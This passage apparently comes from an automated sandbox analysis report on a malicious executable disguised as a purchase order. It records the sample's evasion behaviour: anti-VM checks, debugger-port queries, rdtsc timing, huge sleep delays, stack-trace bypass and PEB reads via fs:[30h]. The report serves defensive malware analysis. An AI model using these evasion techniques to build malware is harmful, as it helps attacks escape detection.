                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: PO -2025918.exe PID: 6680, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
                      Source: C:\Users\user\Desktop\PO -2025918.exeMemory allocated: 2540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeMemory allocated: 4750000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeMemory allocated: 8E20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeMemory allocated: 9E20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeMemory allocated: A040000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeMemory allocated: B040000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD096E rdtsc 4_2_01BD096E
                      Source: C:\Users\user\Desktop\PO -2025918.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4035Jump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\PO -2025918.exe TID: 6756Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 4476Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 4476Thread sleep time: -78000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe TID: 6540Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe TID: 6540Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                      Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AAC600 FindFirstFileW,FindNextFileW,FindClose,9_2_00AAC600
                      Source: C:\Users\user\Desktop\PO -2025918.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: PO -2025918.exe, 00000000.00000002.1894470547.0000000007342000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: nWrCyfejRZk.exe, 0000000A.00000002.3540722904.0000000001570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2423878838.00000260B784C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD096E rdtsc 4_2_01BD096E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00417A63 LdrLoadDll,4_2_00417A63
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C561C3 mov eax, dword ptr fs:[00000030h]4_2_01C561C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C561C3 mov eax, dword ptr fs:[00000030h]4_2_01C561C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E1D0 mov eax, dword ptr fs:[00000030h]4_2_01C0E1D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E1D0 mov eax, dword ptr fs:[00000030h]4_2_01C0E1D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E1D0 mov ecx, dword ptr fs:[00000030h]4_2_01C0E1D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E1D0 mov eax, dword ptr fs:[00000030h]4_2_01C0E1D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0E1D0 mov eax, dword ptr fs:[00000030h]4_2_01C0E1D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C661E5 mov eax, dword ptr fs:[00000030h]4_2_01C661E5
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8A197 mov eax, dword ptr fs:[00000030h]4_2_01B8A197
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8A197 mov eax, dword ptr fs:[00000030h]4_2_01B8A197
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8A197 mov eax, dword ptr fs:[00000030h]4_2_01B8A197
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD0185 mov eax, dword ptr fs:[00000030h]4_2_01BD0185
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C34180 mov eax, dword ptr fs:[00000030h]4_2_01C34180
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C34180 mov eax, dword ptr fs:[00000030h]4_2_01C34180
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC01F8 mov eax, dword ptr fs:[00000030h]4_2_01BC01F8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4C188 mov eax, dword ptr fs:[00000030h]4_2_01C4C188
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4C188 mov eax, dword ptr fs:[00000030h]4_2_01C4C188
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1019F mov eax, dword ptr fs:[00000030h]4_2_01C1019F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1019F mov eax, dword ptr fs:[00000030h]4_2_01C1019F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1019F mov eax, dword ptr fs:[00000030h]4_2_01C1019F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1019F mov eax, dword ptr fs:[00000030h]4_2_01C1019F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C24144 mov eax, dword ptr fs:[00000030h]4_2_01C24144
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C24144 mov eax, dword ptr fs:[00000030h]4_2_01C24144
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C24144 mov ecx, dword ptr fs:[00000030h]4_2_01C24144
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C24144 mov eax, dword ptr fs:[00000030h]4_2_01C24144
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C24144 mov eax, dword ptr fs:[00000030h]4_2_01C24144
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC0124 mov eax, dword ptr fs:[00000030h]4_2_01BC0124
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C28158 mov eax, dword ptr fs:[00000030h]4_2_01C28158
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64164 mov eax, dword ptr fs:[00000030h]4_2_01C64164
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64164 mov eax, dword ptr fs:[00000030h]4_2_01C64164
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov ecx, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov ecx, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov ecx, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E10E mov ecx, dword ptr fs:[00000030h]4_2_01C3E10E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C50115 mov eax, dword ptr fs:[00000030h]4_2_01C50115
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3A118 mov ecx, dword ptr fs:[00000030h]4_2_01C3A118
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3A118 mov eax, dword ptr fs:[00000030h]4_2_01C3A118
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3A118 mov eax, dword ptr fs:[00000030h]4_2_01C3A118
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3A118 mov eax, dword ptr fs:[00000030h]4_2_01C3A118
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B96154 mov eax, dword ptr fs:[00000030h]4_2_01B96154
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B96154 mov eax, dword ptr fs:[00000030h]4_2_01B96154
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8C156 mov eax, dword ptr fs:[00000030h]4_2_01B8C156
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B880A0 mov eax, dword ptr fs:[00000030h]4_2_01B880A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C120DE mov eax, dword ptr fs:[00000030h]4_2_01C120DE
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C160E0 mov eax, dword ptr fs:[00000030h]4_2_01C160E0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9208A mov eax, dword ptr fs:[00000030h]4_2_01B9208A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8C0F0 mov eax, dword ptr fs:[00000030h]4_2_01B8C0F0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD20F0 mov ecx, dword ptr fs:[00000030h]4_2_01BD20F0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B980E9 mov eax, dword ptr fs:[00000030h]4_2_01B980E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8A0E3 mov ecx, dword ptr fs:[00000030h]4_2_01B8A0E3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C280A8 mov eax, dword ptr fs:[00000030h]4_2_01C280A8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C560B8 mov eax, dword ptr fs:[00000030h]4_2_01C560B8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C560B8 mov ecx, dword ptr fs:[00000030h]4_2_01C560B8
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16050 mov eax, dword ptr fs:[00000030h]4_2_01C16050
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8A020 mov eax, dword ptr fs:[00000030h]4_2_01B8A020
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8C020 mov eax, dword ptr fs:[00000030h]4_2_01B8C020
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE016 mov eax, dword ptr fs:[00000030h]4_2_01BAE016
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE016 mov eax, dword ptr fs:[00000030h]4_2_01BAE016
